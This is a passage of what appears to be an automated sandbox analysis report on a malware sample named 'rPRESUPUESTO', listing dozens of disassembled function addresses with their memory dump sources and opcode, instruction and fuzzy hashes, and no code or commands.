                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cbfcce2f491509af8d7c4c0ee1da43550bffde3d704447ba20088417c7d80a3
                                                • Instruction ID: 27933cfe7adc004bd68bae6580258f487970a4de47c27a90f0f595245b794f73
                                                • Opcode Fuzzy Hash: 5cbfcce2f491509af8d7c4c0ee1da43550bffde3d704447ba20088417c7d80a3
                                                • Instruction Fuzzy Hash: 3871D0716042429FD312DF2CC488B2AF7E9FF88310F0885AAE999CB756DB34D945CB91
                                                Function 0185035C Relevance: .2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction ID: 6ff42e4badd8da84e7e365947a4b9af2b70a769a5b43a4b0bcb32b105af5e3fa
                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction Fuzzy Hash: 28716E71A00619EFDB10DFA9C984E9EBBF9FF48704F104569E905EB250DB34EA41CB50
                                                Function 018662A0 Relevance: .2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fcebc1bba3f079980b90727a05c96f8d0a34b011ee6d193e0bbcd7559efe455
                                                • Instruction ID: b958c35d827b0fcabdc021b8f85337427885ffa17ae5e892c10574e3e00ceace
                                                • Opcode Fuzzy Hash: 2fcebc1bba3f079980b90727a05c96f8d0a34b011ee6d193e0bbcd7559efe455
                                                • Instruction Fuzzy Hash: 2C71F432200745AFEB328F18C984F56BBEAFF44764F244518E256CB2A1EB75EA44CB50
                                                Function 017D8AA0 Relevance: .2, Instructions: 197COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9013c4a34e6e9dfc6fa2f9098a24d3348bd10134e96c9e1008e33fbcf33f3498
                                                • Instruction ID: 9c69786b30320767d0e12917abbcc79e2f09f6e1c2dbb1f28fcb27687a0e5a37
                                                • Opcode Fuzzy Hash: 9013c4a34e6e9dfc6fa2f9098a24d3348bd10134e96c9e1008e33fbcf33f3498
                                                • Instruction Fuzzy Hash: E481AD72A1431A8FDB25CF9CD894BADB7B2BF88314F19416DD900AB295C7749E81CB90
                                                Function 018A8324 Relevance: .2, Instructions: 192COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b1b9afacbc79536d5e7e3b73e5682c848d6b619cafa57fa116dee32532ffa4f
                                                • Instruction ID: 59d0b9afeec21dd7cb311191bca696db8dfdee07a711f87e5bd5ea9054577f8b
                                                • Opcode Fuzzy Hash: 8b1b9afacbc79536d5e7e3b73e5682c848d6b619cafa57fa116dee32532ffa4f
                                                • Instruction Fuzzy Hash: 0B713C72E00209AFEF15DF94C881FEEBBB9FB05351F504119EA10E7290D774AA05CBA1
                                                Function 0188A250 Relevance: .2, Instructions: 184COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4d4f5a486007bdbbe16f5fe8d447cf05a57e4acab38c28a11b3139ff3b4c389
                                                • Instruction ID: 9621fbf05f998e0352de289fede7a4bf9a7e7ceafcf609fbaadfb5d52ab8fc8a
                                                • Opcode Fuzzy Hash: a4d4f5a486007bdbbe16f5fe8d447cf05a57e4acab38c28a11b3139ff3b4c389
                                                • Instruction Fuzzy Hash: BA51C172505716AFD726EE6CC884E5BB7E8EBC5B54F00092ABA40DB190D770EE04C7A3
                                                Function 01878350 Relevance: .2, Instructions: 161COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 92365fc8abfb938715dc04d1ab83aa398fcccdc086e1dd0ff14098e5a2414975
                                                • Instruction ID: ff06bb3f11335c26f3437d69f90a728f0fe6bb212612e763769eab8783a7da7e
                                                • Opcode Fuzzy Hash: 92365fc8abfb938715dc04d1ab83aa398fcccdc086e1dd0ff14098e5a2414975
                                                • Instruction Fuzzy Hash: 2B51CE70900709DFD721CF6AC888A6BFBF8BF95714F10461EE292976A1C7B0E645CB90
                                                Function 0180E443 Relevance: .2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39697ce04fe6f0a2f6dca0379454e0446edd50bab1f73d58f7bbdc20ac05dee0
                                                • Instruction ID: df16e4ccd35df26eb6082cce893794373b8e4f0dda9ec394ffd0a1f01c6593cd
                                                • Opcode Fuzzy Hash: 39697ce04fe6f0a2f6dca0379454e0446edd50bab1f73d58f7bbdc20ac05dee0
                                                • Instruction Fuzzy Hash: AE516B71600A09DFCB22EF69C984E6BB3F9FF58744F41086AE552D72A0DB35EA50CB50
                                                Function 01874180 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a898abb720b5eb5fd7551334d55179a84d87eb89b37613489b0af63e628b5da4
                                                • Instruction ID: 4d152a1358d201efaf05045125c4c7fb1d5b69bfcf1f1f6b7c3753febab6c266
                                                • Opcode Fuzzy Hash: a898abb720b5eb5fd7551334d55179a84d87eb89b37613489b0af63e628b5da4
                                                • Instruction Fuzzy Hash: CF5146726083468FD754DF29C881A6BBBE5BFC8308F44492DF599C7250EB30DA05CB52
                                                Function 017F45B1 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction ID: 052e0562106824416a7b1194c28075b097fa86b7d161e76d6f524d876953df9b
                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction Fuzzy Hash: 17518B71E0420AABDF15DF98C444BAFBBB9AF48350F04406DEA02AB351E774DA44CBA0
                                                Function 0185E9E0 Relevance: .2, Instructions: 154COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                • Instruction ID: 6e23cd7c415419ecbf3dc07ce12206579d73b8f7eec758caf517b80caf0bd653
                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                • Instruction Fuzzy Hash: 44519371D0021EABEF619E98CC84BAEFB79EB04365F154665DD12F7190E7309F408BA2
                                                Function 01898B28 Relevance: .2, Instructions: 152COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2b0b1a91f2209e5abd14f00e609825a7e9f9d48a05f97aefb12c60b66aa5cf2
                                                • Instruction ID: 9e85108fe10ec648fead7fccfde651c210412fa3dcb4d08cb10024e60d2c5158
                                                • Opcode Fuzzy Hash: b2b0b1a91f2209e5abd14f00e609825a7e9f9d48a05f97aefb12c60b66aa5cf2
                                                • Instruction Fuzzy Hash: AA41E27070164A9BDF29DB2DC894F3BBB9AEF93324F0C8218E955C7281DB30DA01C691
                                                Function 0185CBF0 Relevance: .1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d6a26df9aa5d2274b02fba6d4fe6e42911dc2b1e2ed7a1aad6fc850c9e5d493
                                                • Instruction ID: 5399e1370e341d5f6b8b218f6bf72761054e2a64d990659389cde583d06ea039
                                                • Opcode Fuzzy Hash: 3d6a26df9aa5d2274b02fba6d4fe6e42911dc2b1e2ed7a1aad6fc850c9e5d493
                                                • Instruction Fuzzy Hash: 8E51697290031ADFCB60DFA9C9849AEBBB9FF48358B654529D945E3305E730AE01CF90
                                                Function 0180A430 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d892b9836946318869c76e1517e6b9a2f144a13fe2c64a1595236f0e3f931c4
                                                • Instruction ID: 1a640d783de681149bbe2ed4f2d86d5936def6a26254877a16d33ccd8cd52f57
                                                • Opcode Fuzzy Hash: 7d892b9836946318869c76e1517e6b9a2f144a13fe2c64a1595236f0e3f931c4
                                                • Instruction Fuzzy Hash: C8410972A403099FCB6AEF6C9CC1B6A776ABB15718F01006DF956DB281EB719B008B51
                                                Function 0189A9D3 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                • Instruction ID: a21985ed1d8e504f8f5a586ba6ca9f1e0907174d4ceaa4bdaf074d2ff3d75e4b
                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                • Instruction Fuzzy Hash: CE41E531A017169FDF29CF68C984A6AB7E9FF84314B09462EE912C7244EB34EE04C790
                                                Function 018001F8 Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 934de9dee63bc76e3ef01b3762bb82b70cafa04c5551eaa43ef99ad8ac5f7790
                                                • Instruction ID: c06924cf87f66f10e2f669eb7737f95f881db2a4b8b4301dea80f67c7a409bf2
                                                • Opcode Fuzzy Hash: 934de9dee63bc76e3ef01b3762bb82b70cafa04c5551eaa43ef99ad8ac5f7790
                                                • Instruction Fuzzy Hash: 6D41DC3290021D9BDB12DF98C840BEEBBB4BF49744F15812AF919F7280D7349E41CBA5
                                                Function 017FEBFC Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57f9f432514beb20fa5b6a6e8f421ffe759f2a0d197c3fa955fbb067eed6d969
                                                • Instruction ID: cad8a05007b2cab08e84445496a7a52b280a180d5e2084ab4c28d79c7aad39d9
                                                • Opcode Fuzzy Hash: 57f9f432514beb20fa5b6a6e8f421ffe759f2a0d197c3fa955fbb067eed6d969
                                                • Instruction Fuzzy Hash: 7641C2726003018FD721DF28C888A2BB7E9FF88314F15486DE656C7726EB75E944CB91
                                                Function 01812750 Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction ID: 35d8b60455f601603b91d9431ba4f5db04fce24b4d15e3a9c8ef7446e1d641ed
                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction Fuzzy Hash: BA515C75A40219CFDB19CF58C480AAEF7B6FF84714F2481A9D916EB351EB70AE41CB90
                                                Function 017D6154 Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74ddd8ba1e691907978a24b41b235330cd1bef186b2a734de870a64ccdd71115
                                                • Instruction ID: 4b5828c7af8062cf4f7ad3c985b7ed256ba57528620171333c892c754c371963
                                                • Opcode Fuzzy Hash: 74ddd8ba1e691907978a24b41b235330cd1bef186b2a734de870a64ccdd71115
                                                • Instruction Fuzzy Hash: 3951F67090420ADFDB25DB68CC04BA9FBB5FF55314F1882A9E519E72D5E734AA81CF80
                                                Function 017D0BCD Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28295df2be27e5e9ca22d9d01a8a9fcde4c2173f7eaa3f9deac6eb6541503449
                                                • Instruction ID: 124138e5526a0a195480b4e739f62b8211882b597863378d07d278309715bc89
                                                • Opcode Fuzzy Hash: 28295df2be27e5e9ca22d9d01a8a9fcde4c2173f7eaa3f9deac6eb6541503449
                                                • Instruction Fuzzy Hash: 5F418F76A002289FDB22DF6CC944BEAB7B8EF49740F0500A5E948EB241D774DE80CB95
                                                Function 0189866E Relevance: .1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction ID: 0230b561a6d43e9e66793b5bb3c1cbc3bd886324213def591f817a44ed2e5818
                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction Fuzzy Hash: BB417375B0010AABDF15DF99CC84AAFBBBAAF8A710F184069E505E7341DA70DF0187A0
                                                Function 017D0887 Relevance: .1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 715b263353362c09434b1a3daa6f105d918867f9cf0db36b9fa4e6a6a21de0d5
                                                • Instruction ID: 18291b311fd79ab2effda63628eb385395ca7fe9ba3e87af8fe6e58702a3b89c
                                                • Opcode Fuzzy Hash: 715b263353362c09434b1a3daa6f105d918867f9cf0db36b9fa4e6a6a21de0d5
                                                • Instruction Fuzzy Hash: F641A0B160070A9FE325CF28C584A26F7F9FF49314F145A6DE546C7A51E730E945CB90
                                                Function 017FA470 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6e5d3ee7530b8e098c21ff75186d1263dd3635d3a91078758f530a36028abda
                                                • Instruction ID: 0ab8f200ea36def2a57eb020d6484bff0c8539509b8642b8b5f9f24bce0a2ced
                                                • Opcode Fuzzy Hash: d6e5d3ee7530b8e098c21ff75186d1263dd3635d3a91078758f530a36028abda
                                                • Instruction Fuzzy Hash: 4841AE3295020ACFDB21DF6CD4987AEBBB4FB58354F2401A9D615BB395DB349A40CFA0
                                                Function 017D8BF0 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fced125d4eb4f81e7bfce6f2c5757a6d46aa6537f289d786fe6867f77f8a938
                                                • Instruction ID: 32404d7dd5cd7132a87a650edb2d6d87096938281c39045a48d028a07f2955be
                                                • Opcode Fuzzy Hash: 8fced125d4eb4f81e7bfce6f2c5757a6d46aa6537f289d786fe6867f77f8a938
                                                • Instruction Fuzzy Hash: 7541543291020ACFD724CF48D894A6AFBB2FF98704F18816ED9019B259C334DA82CFD1
                                                Function 017C8918 Relevance: .1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b52ec8812f778f4a55499f33494ae75c53633c04b3507de2563d981a97bfc6c5
                                                • Instruction ID: 780e3661cdffe78d47d6f64f130a5c4395f31612107a58384f9ea11c7ba0abf2
                                                • Opcode Fuzzy Hash: b52ec8812f778f4a55499f33494ae75c53633c04b3507de2563d981a97bfc6c5
                                                • Instruction Fuzzy Hash: 9F415C315083169FD312DF69C840AABF7E9AF88B54F40092EFA95D7250E730DE448BA3
                                                Function 017CA020 Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction ID: 4b9b135ff496ef50fea1eb7cb726c2d661ff39a87e9c69f472a8c4e9f5e47b1d
                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction Fuzzy Hash: 61416E31A00229DBDB12DE1C8444FBAF771EB54B96F15806EEA40DB245F6338EC0C791
                                                Function 017D09AD Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e1bb10ab95d9d5bed8f0491287b51504f1939daaf52fd8ade99b4759f2aa88d
                                                • Instruction ID: c29d03ab8d90ed6f1e10d339a80518e5f2126c17d51c6dfc02a9f8568bbf460e
                                                • Opcode Fuzzy Hash: 3e1bb10ab95d9d5bed8f0491287b51504f1939daaf52fd8ade99b4759f2aa88d
                                                • Instruction Fuzzy Hash: CD415671640605EFD721CF18C844B26FBF8FF98314F248A6AE449CB251E771EA428B91
                                                Function 01800710 Relevance: .1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction ID: 0937436cfc0e6783b1abbcd0683f8fa2c278be13319ca83d7204888cd646db9d
                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction Fuzzy Hash: C6412871A00609EFDB65CF98C980BAABBF8FF18744B10496DE556DB291D330AB44CF50
                                                Function 017D262C Relevance: .1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5344392f6bcf288badd5cc320ed97e83541123cc0cbfdd2518b9950d4062720b
                                                • Instruction ID: 654e559aa4c92572cfeb0cdc657a4b3626111f42647f73baaf65b8a879d4ed7d
                                                • Opcode Fuzzy Hash: 5344392f6bcf288badd5cc320ed97e83541123cc0cbfdd2518b9950d4062720b
                                                • Instruction Fuzzy Hash: 9C41B0B1501709CFC722EF28C944A65F7F1FF58724F2581ADC6069B6A6EB309A42CF51
                                                Function 0180C8F9 Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8be61d35857e06249678379812f31e096ca2baae1c19b5338b8f9f3c6cf3936
                                                • Instruction ID: 3274da8a36b66df426507c325a89288fcaa0e53705f7b576ab74f75d2ec22d06
                                                • Opcode Fuzzy Hash: a8be61d35857e06249678379812f31e096ca2baae1c19b5338b8f9f3c6cf3936
                                                • Instruction Fuzzy Hash: B0315AB1A00249DFDB52CF98C440B99BBF4FF09714F2085AED119EB291D7769A42CF90
                                                Function 018507C3 Relevance: .1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 537fd514e2a16d59b3dd4dc427cc7bd2ae54828eb39dbc52090d4afcdce3a76f
                                                • Instruction ID: a7e87544ed449cbad90ec0e5c2959960eaee0eccada92462bf664810464cfa19
                                                • Opcode Fuzzy Hash: 537fd514e2a16d59b3dd4dc427cc7bd2ae54828eb39dbc52090d4afcdce3a76f
                                                • Instruction Fuzzy Hash: 744149B25043059FD760DF29C845B9BBBE8FF88764F104A2EF998D7251E7709A04CB92
                                                Function 017C80A0 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12f9cd7705e620fd7b5639e90b69a8dd8292f841ebddc639dc1210dd3bc29e4f
                                                • Instruction ID: 8a7706f23829a4eb74d6f748b142704f415248c017916247aca7c155a3a72e54
                                                • Opcode Fuzzy Hash: 12f9cd7705e620fd7b5639e90b69a8dd8292f841ebddc639dc1210dd3bc29e4f
                                                • Instruction Fuzzy Hash: FA41C171A0561AAFDB01DF58C9806A9F7F1BF94B60F24826ED815A7280D734ED418BD1
                                                Function 018505A7 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d687a5ee104db9e8bbe96f98415c2ccf4bc4a7e16d0951eb757593abf7ec47a1
                                                • Instruction ID: 12b9dc66be32de641b5a6038bded93c8ab26b01279153cbf06e77a614738db28
                                                • Opcode Fuzzy Hash: d687a5ee104db9e8bbe96f98415c2ccf4bc4a7e16d0951eb757593abf7ec47a1
